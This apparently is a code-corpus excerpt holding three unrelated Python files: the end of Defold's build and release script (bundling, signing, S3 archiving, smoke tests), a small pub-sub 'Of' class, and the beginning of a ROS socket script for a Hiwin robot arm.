if os.path.exists(dmg_path): self.upload_to_archive(dmg_path, '%s/%s' % (full_archive_path, dmg_file))
self.wait_uploads()
def run_editor_script(self, cmd):
cwd = join(self.defold_root, 'editor')
run.env_command(self._form_env(), cmd, cwd = cwd)
def build_editor2(self):
cmd = ['python', './scripts/bundle.py',
'--engine-artifacts=%s' % self.engine_artifacts,
'--archive-domain=%s' % self.archive_domain,
'build']
if self.skip_tests:
cmd.append("--skip-tests")
self.run_editor_script(cmd)
def bundle_editor2(self):
if not self.channel:
raise Exception('No channel provided when bundling the editor')
cmd = ['python', './scripts/bundle.py',
'--platform=%s' % self.target_platform,
'--version=%s' % self.version,
'--channel=%s' % self.channel,
'--engine-artifacts=%s' % self.engine_artifacts,
'--archive-domain=%s' % self.archive_domain,
'bundle']
self.run_editor_script(cmd)
def sign_editor2(self):
editor_bundle_dir = join(self.defold_root, 'editor', 'target', 'editor')
cmd = ['python', './scripts/bundle.py',
'--platform=%s' % self.target_platform,
'--bundle-dir=%s' % editor_bundle_dir,
'--archive-domain=%s' % self.archive_domain,
'sign']
if self.skip_codesign:
cmd.append('--skip-codesign')
else:
if self.windows_cert:
cmd.append('--windows-cert=%s' % self.windows_cert)
if self.windows_cert_pass:
cmd.append("--windows-cert-pass=%s" % self.windows_cert_pass)
if self.codesigning_identity:
cmd.append('--codesigning-identity="%s"' % self.codesigning_identity)
self.run_editor_script(cmd)
def notarize_editor2(self):
if self.target_platform != "x86_64-darwin":
return
editor_bundle_dir = join(self.defold_root, 'editor', 'target', 'editor')
# create dmg installer
cmd = ['./scripts/bundle.py',
'--platform=x86_64-darwin',
'--bundle-dir=%s' % editor_bundle_dir,
'--archive-domain=%s' % self.archive_domain,
'installer']
if self.skip_codesign:
cmd.append('--skip-codesign')
else:
if self.codesigning_identity:
cmd.append('--codesigning-identity="%s"' % self.codesigning_identity)
self.run_editor_script(cmd)
# notarize dmg
editor_dmg = join(editor_bundle_dir, 'Defold-x86_64-darwin.dmg')
cmd = ['./scripts/notarize.py',
editor_dmg,
self.notarization_username,
self.notarization_password,
self.notarization_itc_provider]
self.run_editor_script(cmd)
#
# END: EDITOR 2
# ------------------------------------------------------------
def bump(self):
sha1 = self._git_sha1()
with open('VERSION', 'r') as f:
current = f.readlines()[0].strip()
if self.set_version:
new_version = self.set_version
else:
lst = map(int, current.split('.'))
lst[-1] += 1
new_version = '.'.join(map(str, lst))
with open('VERSION', 'w') as f:
f.write(new_version)
print 'Bumping engine version from %s to %s' % (current, new_version)
print 'Review changes and commit'
def save_env(self):
if not self.save_env_path:
self._log("No --save-env-path set when trying to save environment export")
return
env = self._form_env()
res = ""
for key in env:
if bool(re.match('^[a-zA-Z0-9_]+$', key)):
res = res + ("export %s='%s'\n" % (key, env[key]))
with open(self.save_env_path, "w") as f:
f.write(res)
def shell(self):
print 'Setting up shell with DYNAMO_HOME, PATH, ANDROID_HOME and LD_LIBRARY_PATH/DYLD_LIBRARY_PATH (where applicable) set'
if "win32" in self.host:
preexec_fn = None
else:
preexec_fn = self.check_ems
process = subprocess.Popen([SHELL, '-l'], env = self._form_env(), preexec_fn=preexec_fn)
output = process.communicate()[0]
if process.returncode != 0:
self._log(output)
sys.exit(process.returncode)
# ------------------------------------------------------------
# BEGIN: RELEASE
#
def _get_tag_name(self, version, channel):
if channel and channel != 'stable':
channel = '-' + channel
else:
channel = ''
suffix = build_private.get_tag_suffix() # E.g. '' or 'switch'
if suffix:
suffix = '-' + suffix
return '%s%s%s' % (version, channel, suffix)
def create_tag(self):
if self.channel is None:
self._log("No channel specified!")
sys.exit(1)
is_stable = self.channel == 'stable'
channel = '' if is_stable else self.channel
msg = 'Release %s%s%s' % (self.version, '' if is_stable else ' - ', channel)
tag_name = self._get_tag_name(self.version, self.channel)
cmd = 'git tag -f -a %s -m "%s"' % (tag_name, msg)
# E.g.
# git tag -f -a 1.2.184 -m "Release 1.2.184" <- stable
# git tag -f -a 1.2.184-alpha -m "Release 1.2.184 - alpha"
run.shell_command(cmd)
return tag_name
def push_tag(self, tag):
cmd = 'git push -f origin %s' % tag
run.shell_command(cmd)
def _release_web_pages(self, releases):
model = {'releases': releases,
'has_releases': True}
model['release'] = { 'channel': "Unknown", 'version': self.version }
if self.channel:
model['release']['channel'] = self.channel.capitalize()
# We handle the stable channel seperately, since we want it to point
# to the editor-dev release (which uses the latest stable engine).
editor_channel = None
if self.channel == "stable":
editor_channel = "editor-alpha"
else:
editor_channel = self.channel or "stable"
u = urlparse.urlparse(self.get_archive_path())
hostname = u.hostname
bucket = s3.get_bucket(hostname)
editor_archive_path = urlparse.urlparse(self.get_archive_path(editor_channel)).path
release_sha1 = releases[0]['sha1']
editor_download_url = "https://%s%s/%s/%s/editor2/" % (hostname, editor_archive_path, release_sha1, editor_channel)
model['release'] = {'editor': [ dict(name='macOS 10.11+', url=editor_download_url + 'Defold-x86_64-darwin.dmg'),
dict(name='macOS 10.7-10.10', url=editor_download_url + 'Defold-x86_64-darwin.zip'),
dict(name='Windows', url=editor_download_url + 'Defold-x86_64-win32.zip'),
dict(name='Ubuntu 16.04+', url=editor_download_url + 'Defold-x86_64-linux.zip')] }
page = None;
with open(os.path.join("scripts", "resources", "downloads.html"), 'r') as file:
page = file.read()
# NOTE: We upload index.html to /CHANNEL/index.html
# The root-index, /index.html, redirects to /stable/index.html
self._log('Uploading %s/index.html' % self.channel)
html = page % {'model': json.dumps(model)}
key = bucket.new_key('%s/index.html' % self.channel)
key.content_type = 'text/html'
key.set_contents_from_string(html)
self._log('Uploading %s/info.json' % self.channel)
key = bucket.new_key('%s/info.json' % self.channel)
key.content_type = 'application/json'
key.set_contents_from_string(json.dumps({'version': self.version,
'sha1' : release_sha1}))
# Editor update-v3.json
key_v3 = bucket.new_key('editor2/channels/%s/update-v3.json' % self.channel)
key_v3.content_type = 'application/json'
self._log("Updating channel '%s' for update-v3.json: %s" % (self.channel, key_v3))
key_v3.set_contents_from_string(json.dumps({'sha1': release_sha1}))
# Set redirect urls so the editor can always be downloaded without knowing the latest sha1.
# Used by www.defold.com/download
# For example;
# redirect: /editor2/channels/editor-alpha/Defold-x86_64-darwin.dmg -> /archive/<sha1>/editor-alpha/Defold-x86_64-darwin.dmg
for name in ['Defold-x86_64-darwin.dmg', 'Defold-x86_64-win32.zip', 'Defold-x86_64-linux.zip']:
key_name = 'editor2/channels/%s/%s' % (editor_channel, name)
redirect = '%s/%s/%s/editor2/%s' % (editor_archive_path, release_sha1, editor_channel, name)
self._log('Creating link from %s -> %s' % (key_name, redirect))
key = bucket.new_key(key_name)
key.set_redirect(redirect)
def release(self):
""" This step creates a tag using the channel name
* It will update the webpage on d.defold.com (or DM_ARCHIVE_PATH)
* It will update the releases in the target repository
"""
if self.channel is None:
self._log("No channel specified!")
sys.exit(0)
if run.shell_command('git config -l').find('remote.origin.url') != -1 and os.environ.get('GITHUB_WORKFLOW', None) is None:
# NOTE: Only run fetch when we have a configured remote branch.
# When running on buildbot we don't but fetching should not be required either
# as we're already up-to-date
self._log('Running git fetch to get latest tags and refs...')
run.shell_command('git fetch')
# Create or update the tag for engine releases
tag_name = None
if self.channel in ('stable', 'beta', 'alpha'):
tag_name = self.create_tag()
self.push_tag(tag_name)
if tag_name is not None:
# NOTE: Each of the main branches has a channel (stable, beta and alpha)
# and each of them have their separate tag patterns ("1.2.183" vs "1.2.183-beta"/"1.2.183-alpha")
channel_pattern = ''
if self.channel != 'stable':
channel_pattern = '-' + self.channel
platform_pattern = build_private.get_tag_suffix() # E.g. '' or 'switch'
if platform_pattern:
platform_pattern = '-' + platform_pattern
# Example tags:
# 1.2.184, 1.2.184-alpha, 1.2.184-beta
# 1.2.184-switch, 1.2.184-alpha-switch, 1.2.184-beta-switch
pattern = r"(\d+\.\d+\.\d+%s)$" % (channel_pattern + platform_pattern)
releases = s3.get_tagged_releases(self.get_archive_path(), pattern)
else:
# e.g. editor-dev releases
releases = [s3.get_single_release(self.get_archive_path(), self.version, self._git_sha1())]
if not releases:
self.log('Unable to find any releases')
sys.exit(1)
release_sha1 = releases[0]['sha1']
if sys.stdin.isatty():
sys.stdout.write('Release %s with SHA1 %s to channel %s? [y/n]: ' % (self.version, release_sha1, self.channel))
response = sys.stdin.readline()
if response[0] != 'y':
return
# Only release the web pages for the public repo
if not build_private.is_repo_private():
self._release_web_pages(releases);
# Release to github as well
if tag_name:
# only allowed anyways with a github token
release_to_github.release(self, tag_name, release_sha1, releases[0])
#
# END: RELEASE
# ------------------------------------------------------------
def release_to_github(self):
tag_name = self._get_tag_name(self.version, self.channel)
release_sha1 = self._git_sha1(self.version)
releases = [s3.get_single_release(self.get_archive_path(''), self.version, release_sha1)]
#Hack since the no-channel bucket is the one containing both bob and editors
channel = self.channel
self.channel = ''
release_to_github.release(self, tag_name, release_sha1, releases[0])
self.channel = channel
def sync_archive(self):
u = urlparse.urlparse(self.get_archive_path())
bucket_name = u.hostname
bucket = s3.get_bucket(bucket_name)
local_dir = os.path.join(self.dynamo_home, 'archive')
self._mkdirs(local_dir)
if not self.thread_pool:
self.thread_pool = ThreadPool(8)
def download(key, path):
self._log('s3://%s/%s -> %s' % (bucket_name, key.name, path))
key.get_contents_to_filename(path)
futures = []
sha1 = self._git_sha1()
# Only s3 is supported (scp is deprecated)
# The pattern is used to filter out:
# * Editor files
# * Defold SDK files
# * launcher files, used to launch editor2
pattern = re.compile(r'(^|/)editor(2)*/|/defoldsdk\.zip$|/launcher(\.exe)*$')
prefix = s3.get_archive_prefix(self.get_archive_path(), self._git_sha1())
for key in bucket.list(prefix = prefix):
rel = os.path.relpath(key.name, prefix)
if not pattern.search(rel):
p = os.path.join(local_dir, sha1, rel)
self._mkdirs(os.path.dirname(p))
f = Future(self.thread_pool, download, key, p)
futures.append(f)
for f in futures:
f()
# ------------------------------------------------------------
# BEGIN: SMOKE TEST
#
def _download_editor2(self, channel, sha1):
bundles = {
'x86_64-darwin': 'Defold-x86_64-darwin.dmg',
'x86_64-linux' : 'Defold-x86_64-linux.zip',
'x86_64-win32' : 'Defold-x86_64-win32.zip'
}
host2 = get_host_platform2()
bundle = bundles.get(host2)
if bundle:
url = join(self.get_archive_path(), sha1, channel, 'editor2', bundle).replace("s3", "https").replace("\\", "/")
path = self._download(url)
return path
else:
print("No editor2 bundle found for %s" % host2)
return None
def _install_editor2(self, path):
host2 = get_host_platform2()
install_path = join('tmp', 'smoke_test')
if 'darwin' in host2:
out = run.command(['hdiutil', 'attach', path])
print("cmd:" + out)
last = [l2 for l2 in (l1.strip() for l1 in out.split('\n')) if l2][-1]
words = last.split()
fs = words[0]
volume = words[-1]
install_path = join(install_path, 'Defold.app')
self._copy_tree(join(volume, 'Defold.app'), install_path)
result = {'volume': volume,
'fs': fs,
'install_path': install_path,
'resources_path': join('Defold.app', 'Contents', 'Resources'),
'config': join(install_path, 'Contents', 'Resources', 'config')}
return result
else:
if 'win32' in host2 or 'linux' in host2:
self._extract_zip(path, install_path)
else:
self._extract(path, install_path)
install_path = join(install_path, 'Defold')
result = {'install_path': install_path,
'resources_path': 'Defold',
'config': join(install_path, 'config')}
return result
def _uninstall_editor2(self, info):
host2 = get_host_platform2()
shutil.rmtree(info['install_path'])
if 'darwin' in host2:
out = run.command(['hdiutil', 'detach', info['fs']])
def _get_config(self, config, section, option, overrides):
combined = '%s.%s' % (section, option)
if combined in overrides:
return overrides[combined]
if section == 'bootstrap' and option == 'resourcespath':
return '.'
v = config.get(section, option)
m = re.search(r"\${(\w+).(\w+)}", v)
while m:
s = m.group(1)
o = m.group(2)
v = re.sub(r"\${(\w+).(\w+)}", self._get_config(config, s, o, overrides), v, 1)
m = re.search(r"\${(\w+).(\w+)}", v)
return v
def smoke_test(self):
sha1 = self._git_sha1()
cwd = join('tmp', 'smoke_test')
if os.path.exists(cwd):
shutil.rmtree(cwd)
path = self._download_editor2(self.channel, sha1)
info = self._install_editor2(path)
config = ConfigParser()
config.read(info['config'])
overrides = {'bootstrap.resourcespath': info['resources_path']}
jdk = 'jdk11.0.1-p1'
host2 = get_host_platform2()
if 'win32' in host2:
java = join('Defold', 'packages', jdk, 'bin', 'java.exe')
elif 'linux' in host2:
run.command(['chmod', '-R', '755', 'tmp/smoke_test/Defold'])
java = join('Defold', 'packages', jdk, 'bin', 'java')
else:
java = join('Defold.app', 'Contents', 'Resources', 'packages', jdk, 'bin', 'java')
jar = self._get_config(config, 'launcher', 'jar', overrides)
vmargs = self._get_config(config, 'launcher', 'vmargs', overrides).split(',') + ['-Ddefold.log.dir=.', '-Ddefold.smoke.log=true']
vmargs = filter(lambda x: not str.startswith(x, '-Ddefold.update.url='), vmargs)
main = self._get_config(config, 'launcher', 'main', overrides)
game_project = '../../editor/test/resources/geometry_wars/game.project'
args = [java, '-cp', jar] + vmargs + [main, '--preferences=../../editor/test/resources/smoke_test_prefs.json', game_project]
robot_jar = '%s/ext/share/java/defold-robot.jar' % self.dynamo_home
robot_args = [java, '-jar', robot_jar, '-s', '../../share/smoke-test.edn', '-o', 'result']
origdir = os.getcwd()
origcwd = cwd
if 'win32' in host2:
os.chdir(cwd)
cwd = '.'
print('Running robot: %s' % robot_args)
robot_proc = subprocess.Popen(robot_args, cwd = cwd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = False)
time.sleep(2)
self._log('Running editor: %s' % args)
ed_proc = subprocess.Popen(args, cwd = cwd, shell = False)
os.chdir(origdir)
cwd = origcwd
output = robot_proc.communicate()[0]
if ed_proc.poll() == None:
ed_proc.terminate()
ed_proc.wait()
self._uninstall_editor2(info)
result_archive_path = '/'.join(['int.d.defold.com', 'archive', sha1, self.channel, 'editor2', 'smoke_test'])
def _findwebfiles(libdir):
paths = os.listdir(libdir)
paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.html', '.css', '.png')]
return paths
for f in _findwebfiles(join(cwd, 'result')):
self.upload_to_s3(f, 's3://%s/%s' % (result_archive_path, basename(f)))
self.wait_uploads()
self._log('Log: https://s3-eu-west-1.amazonaws.com/%s/index.html' % (result_archive_path))
if robot_proc.returncode != 0:
sys.exit(robot_proc.returncode)
return True
def local_smoke(self):
host2 = get_host_platform2()
cwd = './editor'
if os.path.exists('editor/log.txt'):
os.remove('editor/log.txt')
game_project = 'test/resources/geometry_wars/game.project'
args = ['./scripts/lein', 'with-profile', '+smoke-test', 'run', game_project]
robot_jar = '../defold-robot/target/defold-robot-0.7.0-standalone.jar'
robot_args = ['java', '-jar', robot_jar, '-s', '../share/smoke-test.edn', '-o', 'local_smoke_result']
origdir = os.getcwd()
origcwd = cwd
if 'win32' in host2:
os.chdir(cwd)
args = ['sh'] + args
cwd = '.'
print('Running robot: %s' % robot_args)
robot_proc = subprocess.Popen(robot_args, cwd = cwd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = False)
time.sleep(2)
self._log('Running editor: %s' % args)
ed_proc = subprocess.Popen(args, cwd = cwd, shell = False)
os.chdir(origdir)
cwd = origcwd
output = robot_proc.communicate()[0]
if ed_proc.poll() == None:
ed_proc.terminate()
ed_proc.wait()
if robot_proc.returncode != 0:
sys.exit(robot_proc.returncode)
return True
#
# END: SMOKE TEST
# ------------------------------------------------------------
def get_archive_path(self, channel=None):
if channel is None:
channel = self.channel
assert(type(channel) == str)
return join(self.archive_path, channel)
def get_archive_redirect_key(self, url):
old_url = url.replace(self.get_archive_path().replace("\\", "/"), self.archive_path)
u = urlparse.urlparse(old_url)
return u.path
def download_from_archive(self, src_path, dst_file):
url = join(self.get_archive_path(), src_path)
self.download_from_s3(dst_file, url)
def upload_to_archive(self, src_file, dst_path):
url = join(self.get_archive_path(), dst_path).replace("\\", "/")
self._log("Uploading %s -> %s" % (src_file, url))
self.upload_to_s3(src_file, url)
# create redirect so that the old s3 paths still work
# s3://d.defold.com/archive/channel/sha1/engine/* -> http://d.defold.com/archive/sha1/engine/*
bucket = s3.get_bucket(urlparse.urlparse(url).netloc)
redirect_key = self.get_archive_redirect_key(url)
redirect_url = url.replace("s3://", "http://")
key = bucket.new_key(redirect_key)
key.set_redirect(redirect_url)
self._log("Redirecting %s -> %s : %s" % (url, redirect_key, redirect_url))
def download_from_s3(self, path, url):
url = url.replace('\\', '/')
self._log('Downloading %s -> %s' % (url, path))
u = urlparse.urlparse(url)
if u.scheme == 's3':
self._mkdirs(os.path.dirname(path))
from boto.s3.key import Key
bucket = s3.get_bucket(u.netloc)
k = Key(bucket)
k.key = u.path
k.get_contents_to_filename(path)
self._log('Downloaded %s -> %s' % (url, path))
else:
raise Exception('Unsupported url %s' % (url))
def upload_to_s3(self, path, url):
url = url.replace('\\', '/')
self._log('Uploading %s -> %s' % (path, url))
u = urlparse.urlparse(url)
if u.scheme == 's3':
bucket = s3.get_bucket(u.netloc)
if not self.thread_pool:
self.thread_pool = ThreadPool(8)
p = u.path
if p[-1] == '/':
p += basename(path)
def upload_singlefile():
key = bucket.new_key(p)
key.set_contents_from_filename(path)
self._log('Uploaded %s -> %s' % (path, url))
def upload_multipart():
headers = {}
contenttype, _ = mimetypes.guess_type(path)
if contenttype is not None:
headers['Content-Type'] = contenttype
mp = bucket.initiate_multipart_upload(p, headers=headers)
source_size = os.stat(path).st_size
chunksize = 64 * 1024 * 1024 # 64 MiB
chunkcount = int(math.ceil(source_size / float(chunksize)))
def upload_part(filepath, part, offset, size):
with open(filepath, 'r') as fhandle:
fhandle.seek(offset)
mp.upload_part_from_file(fp=fhandle, part_num=part, size=size)
_threads = []
for i in range(chunkcount):
part = i + 1
offset = i * chunksize
remaining = source_size - offset
size = min(chunksize, remaining)
args = {'filepath': path, 'part': part, 'offset': offset, 'size': size}
self._log('Uploading #%d %s -> %s' % (i + 1, path, url))
_thread = Thread(target=upload_part, kwargs=args)
_threads.append(_thread)
_thread.start()
for i in range(chunkcount):
_threads[i].join()
self._log('Uploaded #%d %s -> %s' % (i + 1, path, url))
if len(mp.get_all_parts()) == chunkcount:
mp.complete_upload()
self._log('Uploaded %s -> %s' % (path, url))
else:
mp.cancel_upload()
self._log('Failed to upload %s -> %s' % (path, url))
f = None
if sys.platform == 'win32':
f = Future(self.thread_pool, upload_singlefile)
else:
f = Future(self.thread_pool, upload_multipart)
self.futures.append(f)
else:
raise Exception('Unsupported url %s' % (url))
def wait_uploads(self):
for f in self.futures:
f()
self.futures = []
def _form_env(self):
env = dict(os.environ)
host = self.host2
if 'x86-' in host:
host = self.host
ld_library_path = 'DYLD_LIBRARY_PATH' if self.host == 'darwin' else 'LD_LIBRARY_PATH'
ld_library_paths = ['%s/lib/%s' % (self.dynamo_home, self.target_platform),
'%s/ext/lib/%s' % (self.dynamo_home, self.host)]
if self.host == 'x86_64-linux':
ld_library_paths.append('%s/ext/SDKs/linux/%s/%s/lib' % (self.dynamo_home, PACKAGES_LINUX_CLANG, PACKAGES_TAPI_VERSION))
env[ld_library_path] = os.path.pathsep.join(ld_library_paths)
pythonpaths = ['%s/lib/python' % self.dynamo_home,
'%s/build_tools' % self.defold,
'%s/ext/lib/python' % self.dynamo_home]
env['PYTHONPATH'] = os.path.pathsep.join(pythonpaths)
env['DYNAMO_HOME'] = self.dynamo_home
env['ANDROID_HOME'] = os.path.join(self.dynamo_home, 'ext', 'SDKs', 'android-sdk')
go_root = '%s/ext/go/%s/go' % (self.dynamo_home, self.target_platform)
android_host = self.host
if 'win32' in android_host:
android_host = 'windows'
paths = os.path.pathsep.join(['%s/bin/%s' % (self.dynamo_home, self.target_platform),
'%s/bin' % (self.dynamo_home),
'%s/ext/bin' % self.dynamo_home,
'%s/ext/bin/%s' % (self.dynamo_home, host),
'%s/bin' % go_root,
'%s/platform-tools' % env['ANDROID_HOME'],
'%s/ext/SDKs/%s/toolchains/llvm/prebuilt/%s-x86_64/bin' % (self.dynamo_home,PACKAGES_ANDROID_NDK,android_host)])
env['PATH'] = paths + os.path.pathsep + env['PATH']
go_paths = os.path.pathsep.join(['%s/go' % self.dynamo_home,
join(self.defold, 'go')])
env['GOPATH'] = go_paths
env['GOROOT'] = go_root
env['MAVEN_OPTS'] = '-Xms256m -Xmx700m -XX:MaxPermSize=1024m'
# Force 32-bit python 2.7 on darwin.
env['VERSIONER_PYTHON_PREFER_32_BIT'] = 'yes'
env['VERSIONER_PYTHON_VERSION'] = '2.7'
if self.no_colors:
env['NOCOLOR'] = '1'
env['EMSCRIPTEN'] = self._form_ems_path()
env['EM_CACHE'] = join(self.get_ems_dir(), 'emscripten_cache')
env['EM_CONFIG'] = join(self.get_ems_dir(), '.emscripten')
xhr2_path = os.path.join(self.dynamo_home, NODE_MODULE_LIB_DIR, 'xhr2', 'package', 'lib')
if 'NODE_PATH' in env:
env['NODE_PATH'] = xhr2_path + os.path.pathsep + env['NODE_PATH']
else:
env['NODE_PATH'] = xhr2_path
return env
if __name__ == '__main__':
boto_path = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../packages/boto-2.28.0-py2.7.whl'))
sys.path.insert(0, boto_path)
usage = '''usage: %prog [options] command(s)
Commands:
distclean - Removes the DYNAMO_HOME folder
install_ext - Install external packages
install_ems - Install emscripten sdk
sync_archive - Sync engine artifacts from S3
activate_ems - Used when changing to a branch that uses a different version of emscripten SDK (resets ~/.emscripten)
build_engine - Build engine
archive_engine - Archive engine (including builtins) to path specified with --archive-path
build_editor2 - Build editor
sign_editor2 - Sign editor
bundle_editor2 - Bundle editor (zip)
archive_editor2 - Archive editor to path specified with --archive-path
download_editor2 - Download editor bundle (zip)
notarize_editor2 - Notarize the macOS version of the editor
build_bob - Build bob with native libraries included for cross platform deployment
archive_bob - Archive bob to path specified with --archive-path
build_docs - Build documentation
build_builtins - Build builtin content archive
bump - Bump version number
release - Release editor
shell - Start development shell
smoke_test - Test editor and engine in combination
local_smoke - Test run smoke test using local dev environment
Multiple commands can be specified
To pass on arbitrary options to waf: build.py OPTIONS COMMANDS -- WAF_OPTIONS
'''
parser = optparse.OptionParser(usage)
parser.add_option('--platform', dest='target_platform',
default = None,
choices = get_target_platforms(),
help = 'Target platform')
parser.add_option('--skip-tests', dest='skip_tests',
action = 'store_true',
default = False,
help = 'Skip unit-tests. Default is false')
parser.add_option('--skip-codesign', dest='skip_codesign',
action = 'store_true',
default = False,
help = 'skip code signing (engine and editor). Default is false')
parser.add_option('--skip-docs', dest='skip_docs',
action = 'store_true',
default = False,
help = 'skip building docs when building the engine. Default is false')
parser.add_option('--skip-builtins', dest='skip_builtins',
action = 'store_true',
default = False,
help = 'skip building builtins when building the engine. Default is false')
parser.add_option('--skip-bob-light', dest='skip_bob_light',
action = 'store_true',
default = False,
help = 'skip building bob-light when building the engine. Default is false')
parser.add_option('--disable-ccache', dest='disable_ccache',
action = 'store_true',
default = False,
help = 'force disable of ccache. Default is false')
parser.add_option('--no-colors', dest='no_colors',
action = 'store_true',
default = False,
help = 'No color output. Default is color output')
default_archive_domain = DEFAULT_ARCHIVE_DOMAIN
parser.add_option('--archive-domain', dest='archive_domain',
default = default_archive_domain,
help = 'Domain where builds will be archived. Default is %s' % default_archive_domain)
default_package_path = CDN_PACKAGES_URL
parser.add_option('--package-path', dest='package_path',
default = default_package_path,
help = 'Either an url to a file server where the sdk packages are located, or a path to a local folder. Reads $DM_PACKAGES_URL. Default is %s.' % default_package_path)
parser.add_option('--set-version', dest='set_version',
default = None,
help = 'Set version explicitily when bumping version')
parser.add_option('--channel', dest='channel',
default = None,
help = 'Editor release channel (stable, beta, ...)')
parser.add_option('--engine-artifacts', dest='engine_artifacts',
default = 'auto',
help = 'What engine version to bundle the Editor with (auto, dynamo-home, archived, archived-stable or a SHA1)')
parser.add_option('--save-env-path', dest='save_env_path',
default = None,
help = 'Save environment variables to a file')
parser.add_option('--notarization-username', dest='notarization_username',
default = None,
help = 'Username to use when sending the editor for notarization')
parser.add_option('--notarization-password', dest='notarization_password',
default = None,
help = 'Password to use when sending the editor for notarization')
parser.add_option('--notarization-itc-provider', dest='notarization_itc_provider',
default = None,
help = 'Optional iTunes Connect provider to use when sending the editor for notarization')
parser.add_option('--github-token', dest='github_token',
default = None,
help = 'GitHub authentication token when releasing to GitHub')
github_release_target_repo = DEFAULT_RELEASE_REPOSITORY
parser.add_option('--github-target-repo', dest='github_target_repo',
default = github_release_target_repo,
help = 'GitHub target repo when releasing artefacts. Default is %s' % github_release_target_repo)
parser.add_option('--github-sha1', dest='github_sha1',
default = None,
help = 'A specific sha1 to use in github operations')
parser.add_option('--version', dest='version',
default = None,
help = 'Version to use instead of from VERSION file')
parser.add_option('--codesigning-identity', dest='codesigning_identity',
default = None,
help = 'Codesigning identity for macOS version of the editor')
parser.add_option('--windows-cert', dest='windows_cert',
default = None,
help = 'Path to codesigning certificate for Windows version of the editor')
parser.add_option('--windows-cert-pass', dest='windows_cert_pass',
default = None,
help = 'Path to file containing password to codesigning certificate for Windows version of the editor')
parser.add_option('--verbose', dest='verbose',
action = 'store_true',
default = False,
help = 'If used, outputs verbose logging')
options, all_args = parser.parse_args()
args = filter(lambda x: x[:2] != '--', all_args)
waf_options = filter(lambda x: x[:2] == '--', all_args)
if len(args) == 0:
parser.error('No command specified')
target_platform = options.target_platform
if not options.target_platform:
target_platform = get_host_platform2()
if 'x86-' in target_platform:
target_platform = get_host_platform() # we need even more cleanup to use "x86-linux" format for everything
c = Configuration(dynamo_home = os.environ.get('DYNAMO_HOME', None),
target_platform = target_platform,
skip_tests = options.skip_tests,
skip_codesign = options.skip_codesign,
skip_docs = options.skip_docs,
skip_builtins = options.skip_builtins,
skip_bob_light = options.skip_bob_light,
disable_ccache = options.disable_ccache,
no_colors = options.no_colors,
archive_domain = options.archive_domain,
package_path = options.package_path,
set_version = options.set_version,
channel = options.channel,
engine_artifacts = options.engine_artifacts,
waf_options = waf_options,
save_env_path = options.save_env_path,
notarization_username = options.notarization_username,
notarization_password = options.notarization_password,
notarization_itc_provider = options.notarization_itc_provider,
github_token = options.github_token,
github_target_repo = options.github_target_repo,
github_sha1 = options.github_sha1,
version = options.version,
codesigning_identity = options.codesigning_identity,
windows_cert = options.windows_cert,
windows_cert_pass = options.windows_cert_pass,
verbose = options.verbose)
for cmd in args:
f = getattr(c, cmd, None)
if not f:
parser.error('Unknown command %s' % cmd)
else:
start = time.time()
print("Running '%s'" % cmd)
f()
c.wait_uploads()
duration = (time.time() - start)
print("'%s' completed in %.2f s" % (cmd, duration))
print('Done')
|
ofsubject.py
|
#! /usr/bin/env python3
"""This module will define the Of functionality for pub-sub-python package
"""
__version__ = '1.0.0.1'
__author__ = 'Midhun C Nair <midhunch@gmail.com>'
__maintainers__ = [
'Midhun C Nair <midhunch@gmail.com>',
]
from threading import Thread
from uuid import uuid4
from time import sleep
from ps_py.subject import Subject
from ps_py.utils import (
get_unique_id,
)
class Of:
"""
"""
def __init__(self, *args, timeout=5):
"""
"""
self.id = str(uuid4())
self.int_id = get_unique_id(self.id)[0]
self.subject = Subject(self.int_id, initial_value=None)
self.args = args
self.index = -1
self.timeout = timeout
@property
def args(self):
"""
"""
return self._args
@args.setter
def args(self, value):
"""
"""
if (
isinstance(value, str)
or not hasattr(value, '__iter__')
):
raise ValueError("Expected an iterable value but got type '%s'" % type(value))
self._args = value
def subscribe(self, onSuccess, onError=None):
"""
"""
sub = self.subject.subscribe(onSuccess=onSuccess, onError=onError)
self.subscribers[sub.name] = sub
if self.index == -1:
self.run()
return sub
def run(self):
"""
"""
self.index = 0
def _run():
"""
"""
for item in self.args:
self.subject.next(item)
sleep(self.timeout)
thread = Thread(target=_run)
thread.daemon = True
thread.start()
# thread.join()
def pipe(self, *args):
"""
"""
return self.subject.pipe(*args)
@property
def subscribers(self):
"""
"""
try:
if not isinstance(self._subscribers, dict):
self._subscribers = {}
except AttributeError:
self._subscribers = {}
return self._subscribers
|
HiwinRA605_socket_ros_test_20190626103751.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
# def socket_client_sent_flag(Sent_flag):
# global sent_feedback
# rospy.wait_for_service('sent_flag')
# try:
# Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
